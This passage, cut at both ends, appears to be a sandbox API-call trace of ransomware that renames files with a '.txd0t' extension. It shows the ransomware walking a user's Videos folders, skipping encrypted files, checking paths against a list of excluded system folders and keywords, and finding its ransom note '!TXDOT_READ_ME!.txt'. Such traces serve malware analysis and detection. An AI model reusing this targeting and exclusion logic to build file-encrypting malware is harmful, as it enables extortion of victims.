w2nq\\Z2p1JCW7G9Pu\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\" [0090.357] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\", psz2="AuNane-wUgoPDM.swf.txd0t", cchMax=1134 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\AuNane-wUgoPDM.swf.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\AuNane-wUgoPDM.swf.txd0t" [0090.357] PathFindExtensionW (pszPath="AuNane-wUgoPDM.swf.txd0t") returned=".txd0t" [0090.357] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.357] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x561ea00 | out: lpFindFileData=0x561ea00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaaf48690, ftCreationTime.dwHighDateTime=0x1d5f08b, ftLastAccessTime.dwLowDateTime=0xdd8dc560, ftLastAccessTime.dwHighDateTime=0x1d5f00b, ftLastWriteTime.dwLowDateTime=0x5300ee3c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xae32, dwReserved0=0x570ea4, dwReserved1=0x0, cFileName="w7jO4I_4r ubq7OFIn.flv.txd0t", cAlternateFileName="W7JO4I~1.TXD")) returned 1 [0090.357] StrCmpW (psz1="w7jO4I_4r ubq7OFIn.flv.txd0t", psz2=".") returned 1 [0090.357] StrCmpW (psz1="w7jO4I_4r ubq7OFIn.flv.txd0t", psz2="..") returned 1 [0090.357] StrCpyNW (in: psz1=0xecbb70, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", cchMax=1134 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu" [0090.357] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu", psz2="\\", cchMax=1134 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\" [0090.357] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\", psz2="w7jO4I_4r ubq7OFIn.flv.txd0t", cchMax=1134 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\w7jO4I_4r ubq7OFIn.flv.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\Z2p1JCW7G9Pu\\w7jO4I_4r ubq7OFIn.flv.txd0t" [0090.357] PathFindExtensionW (pszPath="w7jO4I_4r ubq7OFIn.flv.txd0t") returned=".txd0t" [0090.357] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.357] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x561ea00 | out: lpFindFileData=0x561ea00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaaf48690, ftCreationTime.dwHighDateTime=0x1d5f08b, ftLastAccessTime.dwLowDateTime=0xdd8dc560, ftLastAccessTime.dwHighDateTime=0x1d5f00b, ftLastWriteTime.dwLowDateTime=0x5300ee3c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xae32, dwReserved0=0x570ea4, dwReserved1=0x0, cFileName="w7jO4I_4r ubq7OFIn.flv.txd0t", cAlternateFileName="W7JO4I~1.TXD")) returned 0 [0090.357] FindClose (in: hFindFile=0xec23f0 | out: hFindFile=0xec23f0) returned 1 [0090.357] GetProcessHeap () returned 0xe30000 [0090.357] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecbb70 | out: hHeap=0xe30000) returned 1 [0090.357] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b79baf0, ftCreationTime.dwHighDateTime=0x1d5eca1, ftLastAccessTime.dwLowDateTime=0x5d533ed0, ftLastAccessTime.dwHighDateTime=0x1d5ed9e, ftLastWriteTime.dwLowDateTime=0x5303514a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x8838, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="ZXAEqbOqqWast AZ98L.flv.txd0t", cAlternateFileName="ZXAEQB~1.TXD")) returned 1 [0090.357] StrCmpW (psz1="ZXAEqbOqqWast AZ98L.flv.txd0t", psz2=".") returned 1 [0090.357] StrCmpW (psz1="ZXAEqbOqqWast AZ98L.flv.txd0t", psz2="..") returned 1 [0090.357] StrCpyNW (in: psz1=0xec7f28, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq" [0090.357] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq", psz2="\\", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\" [0090.357] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\", psz2="ZXAEqbOqqWast AZ98L.flv.txd0t", cchMax=1108 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\ZXAEqbOqqWast AZ98L.flv.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\a w2nq\\ZXAEqbOqqWast AZ98L.flv.txd0t" [0090.357] PathFindExtensionW (pszPath="ZXAEqbOqqWast AZ98L.flv.txd0t") returned=".txd0t" [0090.357] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.357] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b79baf0, ftCreationTime.dwHighDateTime=0x1d5eca1, ftLastAccessTime.dwLowDateTime=0x5d533ed0, ftLastAccessTime.dwHighDateTime=0x1d5ed9e, ftLastWriteTime.dwLowDateTime=0x5303514a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x8838, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="ZXAEqbOqqWast AZ98L.flv.txd0t", cAlternateFileName="ZXAEQB~1.TXD")) returned 0 [0090.357] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0090.357] GetProcessHeap () returned 0xe30000 [0090.357] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec7f28 | out: hHeap=0xe30000) returned 1 [0090.358] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda7902c0, ftCreationTime.dwHighDateTime=0x1d5eff4, ftLastAccessTime.dwLowDateTime=0x7abe1d0, ftLastAccessTime.dwHighDateTime=0x1d5e88f, ftLastWriteTime.dwLowDateTime=0x5303514a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xdf4b, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="ay37U hT.mp4.txd0t", cAlternateFileName="AY37UH~1.TXD")) returned 1 [0090.358] StrCmpW (psz1="ay37U hT.mp4.txd0t", psz2=".") returned 1 [0090.358] StrCmpW (psz1="ay37U hT.mp4.txd0t", psz2="..") returned 1 [0090.358] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_" [0090.358] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\" [0090.358] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\", psz2="ay37U hT.mp4.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\ay37U hT.mp4.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\ay37U hT.mp4.txd0t" [0090.358] PathFindExtensionW (pszPath="ay37U hT.mp4.txd0t") returned=".txd0t" [0090.358] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.358] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61371310, ftCreationTime.dwHighDateTime=0x1d5eb09, ftLastAccessTime.dwLowDateTime=0x7f6f64c0, ftLastAccessTime.dwHighDateTime=0x1d5e81d, ftLastWriteTime.dwLowDateTime=0x5305bd01, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x13663, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="kxtmh_DCIU7SgwmG7I.swf.txd0t", cAlternateFileName="KXTMH_~1.TXD")) returned 1 [0090.358] StrCmpW (psz1="kxtmh_DCIU7SgwmG7I.swf.txd0t", psz2=".") returned 1 [0090.358] StrCmpW (psz1="kxtmh_DCIU7SgwmG7I.swf.txd0t", psz2="..") returned 1 [0090.358] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_" [0090.358] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\" [0090.358] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\", psz2="kxtmh_DCIU7SgwmG7I.swf.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\kxtmh_DCIU7SgwmG7I.swf.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\kxtmh_DCIU7SgwmG7I.swf.txd0t" [0090.358] PathFindExtensionW (pszPath="kxtmh_DCIU7SgwmG7I.swf.txd0t") returned=".txd0t" [0090.358] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.358] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa587ac60, ftCreationTime.dwHighDateTime=0x1d5e0cc, ftLastAccessTime.dwLowDateTime=0xc8cf62e0, ftLastAccessTime.dwHighDateTime=0x1d5e3c3, ftLastWriteTime.dwLowDateTime=0x530815e9, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x8863, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="OoNzmd4unsBSLKUjo7.avi.txd0t", cAlternateFileName="OONZMD~1.TXD")) returned 1 [0090.358] StrCmpW (psz1="OoNzmd4unsBSLKUjo7.avi.txd0t", psz2=".") returned 1 [0090.358] StrCmpW (psz1="OoNzmd4unsBSLKUjo7.avi.txd0t", psz2="..") returned 1 [0090.358] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_" [0090.358] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\" [0090.358] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\", psz2="OoNzmd4unsBSLKUjo7.avi.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\OoNzmd4unsBSLKUjo7.avi.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\OoNzmd4unsBSLKUjo7.avi.txd0t" [0090.358] PathFindExtensionW (pszPath="OoNzmd4unsBSLKUjo7.avi.txd0t") returned=".txd0t" [0090.358] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.358] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x94e1c850, ftCreationTime.dwHighDateTime=0x1d5ec3e, ftLastAccessTime.dwLowDateTime=0x90cdc3c0, ftLastAccessTime.dwHighDateTime=0x1d5e1d7, ftLastWriteTime.dwLowDateTime=0x530815e9, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xf82b, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="t8NhEX.mkv.txd0t", cAlternateFileName="T8NHEX~1.TXD")) returned 1 [0090.358] StrCmpW (psz1="t8NhEX.mkv.txd0t", psz2=".") returned 1 [0090.358] StrCmpW (psz1="t8NhEX.mkv.txd0t", psz2="..") returned 1 [0090.358] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_" [0090.358] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\" [0090.358] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\", psz2="t8NhEX.mkv.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\t8NhEX.mkv.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\t8NhEX.mkv.txd0t" [0090.358] PathFindExtensionW (pszPath="t8NhEX.mkv.txd0t") returned=".txd0t" [0090.358] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.359] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44514d30, ftCreationTime.dwHighDateTime=0x1d5e0bc, ftLastAccessTime.dwLowDateTime=0x594629e0, ftLastAccessTime.dwHighDateTime=0x1d5ee81, ftLastWriteTime.dwLowDateTime=0x530a775c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x6f98, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="VzUBwEA5P.avi.txd0t", cAlternateFileName="VZUBWE~1.TXD")) returned 1 [0090.359] StrCmpW (psz1="VzUBwEA5P.avi.txd0t", psz2=".") returned 1 [0090.359] StrCmpW (psz1="VzUBwEA5P.avi.txd0t", psz2="..") returned 1 [0090.359] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_" [0090.359] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\" [0090.359] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\", psz2="VzUBwEA5P.avi.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\VzUBwEA5P.avi.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\VzUBwEA5P.avi.txd0t" [0090.359] PathFindExtensionW (pszPath="VzUBwEA5P.avi.txd0t") returned=".txd0t" [0090.359] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.359] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1305e060, ftCreationTime.dwHighDateTime=0x1d5e116, ftLastAccessTime.dwLowDateTime=0x62ec8ea0, ftLastAccessTime.dwHighDateTime=0x1d5e16e, ftLastWriteTime.dwLowDateTime=0x530cdabd, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1163c, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="WxV-TMM4v.avi.txd0t", cAlternateFileName="WXV-TM~1.TXD")) returned 1 [0090.359] StrCmpW (psz1="WxV-TMM4v.avi.txd0t", psz2=".") returned 1 [0090.359] StrCmpW (psz1="WxV-TMM4v.avi.txd0t", psz2="..") returned 1 [0090.359] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_" [0090.359] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\" [0090.359] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\", psz2="WxV-TMM4v.avi.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\WxV-TMM4v.avi.txd0t") returned="C:\\Users\\FD1HVy\\Videos\\ofxv0mmpKK_\\WxV-TMM4v.avi.txd0t" [0090.359] PathFindExtensionW (pszPath="WxV-TMM4v.avi.txd0t") returned=".txd0t" [0090.359] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.359] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1305e060, ftCreationTime.dwHighDateTime=0x1d5e116, ftLastAccessTime.dwLowDateTime=0x62ec8ea0, ftLastAccessTime.dwHighDateTime=0x1d5e16e, ftLastWriteTime.dwLowDateTime=0x530cdabd, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1163c, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="WxV-TMM4v.avi.txd0t", cAlternateFileName="WXV-TM~1.TXD")) returned 0 [0090.360] FindClose (in: hFindFile=0xec26f0 | out: hFindFile=0xec26f0) returned 1 [0090.360] GetProcessHeap () returned 0xe30000 [0090.360] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec7a58 | out: hHeap=0xe30000) returned 1 [0090.360] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x91d2f950, ftCreationTime.dwHighDateTime=0x1d5ec4c, ftLastAccessTime.dwLowDateTime=0x531402ec, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x531402ec, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="WlTa", cAlternateFileName="")) returned 1 [0090.360] StrCmpW (psz1="WlTa", psz2=".") returned 1 [0090.360] StrCmpW (psz1="WlTa", psz2="..") returned 1 [0090.360] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Videos", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos") returned="C:\\Users\\FD1HVy\\Videos" [0090.360] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos", psz2="\\", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\") returned="C:\\Users\\FD1HVy\\Videos\\" [0090.360] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\", psz2="WlTa", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa") returned="C:\\Users\\FD1HVy\\Videos\\WlTa" [0090.360] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch="\\windows\\system32\\") returned 0x0 [0090.360] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.360] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch="\\windows\\system\\") returned 0x0 [0090.360] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.360] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.360] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch="\\appdata\\local\\") returned 0x0 [0090.360] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.360] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.360] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.360] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch=":\\boot\\") returned 0x0 [0090.360] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch=":\\perflogs\\") returned 0x0 [0090.361] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch=":\\programdata\\") returned 0x0 [0090.361] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch=":\\drivers\\") returned 0x0 [0090.361] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch=":\\wsus\\") returned 0x0 [0090.361] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.361] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.361] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch="crypt_detect") returned 0x0 [0090.361] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch="cryptolocker") returned 0x0 [0090.361] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch="ransomware") returned 0x0 [0090.361] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch="C:\\WINDOWS") returned 0x0 [0090.361] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.361] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch="C:\\Program Files") returned 0x0 [0090.361] GetProcessHeap () returned 0xe30000 [0090.361] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b8) returned 0xec7a58 [0090.361] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\Videos\\WlTa", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa") returned="C:\\Users\\FD1HVy\\Videos\\WlTa" [0090.361] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa", psz2="\\*", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\*") returned="C:\\Users\\FD1HVy\\Videos\\WlTa\\*" [0090.361] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\WlTa\\*", lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x91d2f950, ftCreationTime.dwHighDateTime=0x1d5ec4c, ftLastAccessTime.dwLowDateTime=0x531402ec, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x531402ec, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec24f0 [0090.361] StrCmpW (psz1=".", psz2=".") returned 0 [0090.361] FindNextFileW (in: hFindFile=0xec24f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x91d2f950, ftCreationTime.dwHighDateTime=0x1d5ec4c, ftLastAccessTime.dwLowDateTime=0x531402ec, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x531402ec, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.361] StrCmpW (psz1="..", psz2=".") returned 1 [0090.361] StrCmpW (psz1="..", psz2="..") returned 0 [0090.361] FindNextFileW (in: hFindFile=0xec24f0, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x530f3d77, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x530f3d77, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x530f3d77, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0090.361] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0090.361] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0090.361] StrCpyNW (in: psz1=0xec7a58, psz2="C:\\Users\\FD1HVy\\Videos\\WlTa", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa") returned="C:\\Users\\FD1HVy\\Videos\\WlTa" [0090.361] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa", psz2="\\", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\") returned="C:\\Users\\FD1HVy\\Videos\\WlTa\\" [0090.361] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Videos\\WlTa\\!TXDOT_READ_ME!.txt" [0090.361] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0090.361] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0090.361] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0090.362] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0090.362] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0090.362] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0090.362] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0090.362] StrCmpIW 